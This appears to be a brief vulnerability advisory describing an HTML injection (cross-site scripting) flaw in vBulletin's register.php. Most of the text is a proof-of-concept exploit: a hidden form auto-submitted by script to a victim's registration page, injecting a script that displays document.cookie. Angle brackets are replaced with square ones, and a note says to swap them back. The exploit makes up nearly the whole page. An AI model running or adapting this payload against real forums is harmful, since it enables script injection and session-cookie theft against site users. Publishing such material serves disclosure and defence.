|
vBulletin Register.PHP HTML Injection Vulnerability
The following example has been provided: [form action="http://[victim]/register.php?do=register" method="post" style="display:none"] [input type="hidden" name="s" value="" /] [input type="hidden" name="regtype" value="1" /] [input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" /] [input type="hidden" name="url" value="index.php" /] [input type="hidden" name="do" value="addmember" /] [/form] [script] //Code that will be executed var xss = "\"][script]alert(document"+".cookie)[\/script]"; document.forms[0].field1.value=xss; document.forms[0].submit(); [/script] *Replace ([],<>) |
|
|
Privacy Statement |
